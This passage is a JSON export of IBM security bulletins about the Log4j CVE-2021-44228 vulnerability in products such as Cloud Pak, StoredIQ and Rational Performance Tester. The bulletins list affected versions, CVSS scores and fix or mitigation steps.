"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:20", "description": "## Summary\n\nLog4j CVE-2021-44228 also called Log4Shell or LogJam affected the CP4BA Workflow Process Service. Customers are encouraged to take action and apply the fix below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nCP4BA - Workflow Process Services| 21.0.2 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by applying the Interim Fix (iFix) or Cumulative Fix (CF): \n\nFor IBM Cloud Pak for Business Automation V21.0.2. Apply IF006 or above.\n\nUpdate the image by following the steps in CP4BA [21.0.2 IF006 release note](<https://www.ibm.com/support/pages/node/6524920> \"21.0.2 IF006 release note\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n15 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS7JTW\",\"label\":\"IBM Cloud Pak for Automation\"},\"Component\":\"Workflow Process Service\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"21.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T01:52:37", "type": "ibm", "title": "Security Bulletin: Log4j - CVE-2021-44228 vulnerability affects IBM Cloud Pak for Business Automation(CP4BA) Workflow Process Service", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-21T01:52:37", "id": "CCE74B609685420B52F0CE6D14ACF26F43DB5C6A64A19034DCD1E9CB0CA2BE72", "href": "https://www.ibm.com/support/pages/node/6528692", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-19T17:39:26", "description": "## Summary\n\nIs Blueworks Live affected by CVE-2021-44228 (Log4j Vulnerability)?\n\n## Vulnerability Details\n\nPlease refer to the Flash Alert published here:\n<https://www.ibm.com/support/pages/node/6527936>\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](\nhttp://www-01.ibm.com/software/support/einfo.html) to be notified of important\nproduct support alerts like this.\n\nOff\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](http://www.ibm.com/security/secure-\nengineering/bulletins.html) \n[IBM Product Security Incident Response Blog](http://www.ibm.com/blogs/psirt)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the\nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard\ndesigned to convey vulnerability severity and help to determine urgency and\npriority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY\nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT\nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Type\":\"MASTER\",\"Line of\nBusiness\":{\"code\":\"LOB45\",\"label\":\"Automation\"},\"Business\nUnit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o\nTPS\"},\"Product\":{\"code\":\"SS2MKC\",\"label\":\"IBM Blueworks Live\"},\"ARM\nCategory\":[{\"code\":\"a8m50000000L2DTAA0\",\"label\":\"DevOps-\\u003EServer\nIssues\"}],\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform\nIndependent\"}],\"Version\":\"All Versions\"}]\n\n## Product Synonym\n\nblueworkslive", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T17:30:47", "type": "ibm", "title": "Security Bulletin: Is Blueworks Live affected by CVE-2021-44228 (Log4j Vulnerability)?", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T17:30:47", "id": "519FF26BE329CC59BFF47E2AAC0D4B73FCA35BCF836D736A007D121863323E8C", "href": "https://www.ibm.com/support/pages/node/6526706", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:36:45", "description": "## Summary\n\nStoredIQ is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44228). Apache Log4j is used by StoredIQ 7.6.0 as part of its logging infrastructure. The fix includes Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nStoredIQ| 7.6.0.0 - 7.6.0.22 \n \n\n\n## Remediation/Fixes\n\nUpgrade to fix pack 7.6.0.22 and apply interim fix siq_7_6_0_22_log4j_2_17_1_if that is available from Fix Central [https://www.ibm.com/support/fixcentral/. ](<https://www.ibm.com/support/fixcentral/.>)Instructions are included in the ReadMe in the interim fix.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n16 Jun 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSHEC\",\"label\":\"StoredIQ\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"7.6.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-17T21:36:21", "type": "ibm", "title": "Security Bulletin: StoredIQ Is Vulnerable To Arbitrary Code Execution Due to Apache Log4j (CVE-2021-44228).", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-17T21:36:21", "id": "C0CE38B8081A59A18598B204BF933579D5A04D57C0E8BBBEC053AC1350A2938C", "href": "https://www.ibm.com/support/pages/node/6596145", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:33", "description": "## Summary\n\nApache Log4j vulnerability impacts Rational Performance Tester (RPT) Apache JMeter\u2122 Test Extension. Rational Performance Tester (RPT) includes a vulnerable Log4j library that may be detected by a vulnerability scan. This bulletin addresses the vulnerabilities for the reported CVE-2021-44228. The below fix package removes the Log4j version 2 library.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nRational Performance Tester | 10.2 \nRational Performance Tester| 10.1 \nRational Performance Tester| 10.0 \nRational Performance Tester| 9.5 \n \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\n**Customers that are using the Apache JMeter Test Extension should upgrade to Rational Performance Tester version 10.2 and use Installation Manager to update to version 10.2.1.1 iFix 01. **\n\n[https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm%7ERational&product=ibm/Rational/Rational+Performance+Tester&release=10.2.1&platform=All&function=fixId&fixids=10.2.1.1-Rational-RPT-groupfixpack&includeRequisites=1&includeSupersedes=0&downloadMethod=http](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm%7ERational&product=ibm/Rational/Rational+Performance+Tester&release=10.2.1&platform=All&function=fixId&fixids=10.2.1.1-Rational-RPT-groupfixpack&includeRequisites=1&includeSupersedes=0&downloadMethod=http>)\n\n**Customers not using the Apache JMeter Test Extension may remediate their systems by uninstalling the Apache JMeter Test Extension OR installing Rational Performance Tester version 10.2.1.1 iFix 01. **\n\nRational Performance Tester version 10.2.1.1 iFix 01 removes the vulnerable Apache Log4j version 2 library from Rational Performance Tester. \nTo uninstall the Apache JMeter Test Extension: \n1\\. Stop or exit from the Eclipse instance of Rational Performance Tester. \n2\\. Start Installation Manager. \n3\\. Select Modify. \n4\\. Clear the Apache JMeter Test Extension checkbox.\n\nRational Performance Tester version 10.2.1.1 iFix 01 can be updated via Installation Manager or downloaded from Fix Central. \nTo install Rational Performance Tester version 102.1.1.1 iFix 01: \n1\\. Upgrade from version 9.5, 10.0 or 10.1 to Rational Performance Tester version 10.2. \n2\\. In Installation Manager choose Update and select version 10.2.1.1 iFix 01.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n27 Dec 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSMMM5\",\"label\":\"Rational Performance Tester\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"9.5, 10.0, 10.1, 10.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T14:08:40", "type": "ibm", "title": "Security Bulletin: Rational Performance Tester (RPT) is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-04T14:08:40", "id": "F89923018671257EB76989AE7AB9D39396FBAD6F8846CB56D6915361F1CCCC48", "href": "https://www.ibm.com/support/pages/node/6538090", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:29", "description": "## Summary\n\nIBM Cloud Pak for Multicloud Management has applied security fixes for its use of Log4j for CVE-2021-44228. Log4j is used by various microservices either directly or indirectly through dependent open source software for logging messages to files. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Pak for Multicloud Management Security Services| Before 2.3 Fixpack 3 \nIBM Cloud Pak for Multicloud Management Monitoring| Before 2.3 Fixpack 3 \n \n## Remediation/Fixes\n\nUpgrade to IBM Cloud Pak for Multicloud Management 2.3 Fix Pack 3 by following the instructions at <https://ibm.biz/upgrade_fixpack>. \n\n**Note: **\n\n\\- The Apache Log4j open source library is used by Elasticsearch for logging messages to files. The recommended solution involves two images of IBM Cloud Pak for Multicloud Management: **icp-elasticsearch-oss**. This image has been updated to use Elasticsearch 6.8.21 in IBM Cloud Pak for Multicloud Management 2.3 Fix Pack 3. For details about Elasticsearch announcement (ESA-2021-31), see <https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476>\n\n\\- Where the log4j package could not be updated at this time, this 2.3 Fix Pack3 release mitigates the vulnerability by setting the JVM option 3.4k -Dlog4j2.formatMsgNoLookups=true and removing the vulnerable JndiLookup class from the Log4j package. Some vulnerability scanners might continue to flag Elasticsearch in association with this vulnerability based on the Log4j version alone. However, the mitigations sufficiently protect both remote code execution and information leakage.\n\n## Workarounds and Mitigations\n\nIBM recommends clients should configure their firewalls to block unauthorized outbound connections to mitigate against this and similar vulnerabilities.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n15 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSFC4F\",\"label\":\"IBM Cloud Pak for Multicloud Management\"},\"Component\":\"Monitoring\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-05T19:09:46", "type": "ibm", "title": "Security Bulletin: IBM Cloud Pak for Multicloud Management has applied security fixes for its use of Log4j for CVE-2021-44228", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-05T19:09:46", "id": "90BE58D9524F7F6A98C3EE79C93A2EE6A0EA2C0D7E33DC628128C7D1BCFA8619", "href": "https://www.ibm.com/support/pages/node/6528670", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:49", "description": "## Summary\n\nIBM Edge Application Manager (IEAM) 4.3.0 has a dependency on IBM Cloud Pak Foundational Services (IBM Common Services) which includes an unused Operator that contains a vulnerable version of Apache Log4j as described in CVE-2021-44228. An upgrade has been released which includes Apache Log4j version 2.15.0 to address this vulnerability.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Edge Application Manger| 4.3 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing this vulnerability now by upgrading.**\n \n \n By default subscriptions to the IBM Edge Application Manager (IEAM)operator and its dependent operands are set \n to automatic approval for its update channel. This means that new releases of IEAM or its dependencies for the \n configured channel will be automatically applied.\n \n Note: A Cluster Administrator can set the approval strategy to Manual. In this case \n a Cluster Administrator will need to manually approve pending changes.\n \n Otherwise, the latest version of IBM Cloud Pak Foundational Services (3.6.7) \n has been released and all IBM Edge Application Manager 4.3.0 instances will be\n upgraded automatically without user-intervention if automatic updates are \n enabled.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n17 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS7L5K\",\"label\":\"IBM Edge Application Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"4.3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-23T18:23:33", "type": "ibm", "title": "Security Bulletin: IBM Edge Application Manager is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-23T18:23:33", "id": "942A563AC62B9ED7ADC9AAA1A75FE9F97DA036B632DE9ECD7DC3CC1E19EC9A60", "href": "https://www.ibm.com/support/pages/node/6536936", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:00", "description": "## Summary\n\nWebSphere Application Server, which is bundled with IBM Cloud Pak for Applications, is exposed to a vulnerability in Apache Log4j (CVE-2021-44228)\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nPrincipal Products(s) and Version(s) Affected| Affected Supporting Product(s) and Version(s) \n---|--- \nIBM Cloud Pak for Applications, all versions| \n\nWebSphere Application Server\n\n * 9.0\n * 8.5 \n \n## Remediation/Fixes\n\nRefer to the following security bulletin for vulnerability details and information about fixes addressed by WebSphere Application Server which is shipped with IBM Cloud Pak for Applications.\n\n[Vulnerability in Apache Log4j affects WebSphere Application Server 